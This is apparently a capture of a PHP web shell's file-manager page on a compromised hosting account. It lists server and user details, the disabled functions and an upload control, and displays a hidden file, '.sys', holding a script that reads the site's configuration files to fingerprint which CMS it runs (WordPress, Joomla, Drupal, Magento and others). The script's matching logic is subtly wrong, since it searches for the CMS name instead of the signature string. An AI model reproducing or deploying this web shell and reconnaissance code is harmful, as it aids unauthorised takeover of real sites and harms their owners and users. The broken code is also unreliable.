HEX
Server: LiteSpeed
System: Linux rs4-or.serverhostgroup.com 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64
User: carunloc (2240)
PHP: 7.4.33
Disabled: exec, passthru, shell_exec
Upload Files
File: /home2/carunloc/.cagefs/tmp/.sys
<?php   $r = '/home2/carunloc/public_html'; $a = ['wp-config.php' => ['DB_PASSWORD' => 'wp'], 'index.php' => ['@package    Joomla.Site' => 'joomla', 'DRUPAL_ROOT' => 'drupal', 'use Magento\Framework\App\Bootstrap' => 'magento'], 'configuration.php' => ['JConfig' => 'joomla'], 'cron.php' => ['DRUPAL_ROOT' => 'drupal', 'Magento\Store\Model' => 'magento'], 'init.php' => ['Copyright since 2007 PrestaShop' => 'prestashop'], 'config.php' => ["define('DIR_APPLICATION'" => 'opencart']];  foreach ($a as $path => $patterns) {     $t = "{$r}/{$path}";     if (file_exists($t)) {         $c = file_get_contents($t);         foreach ($patterns as $p => $cms) {             if(strstr($c, $cms)) {                 die("<c>{$cms}</c>");             }         }     } } die('<c>unknown</c>');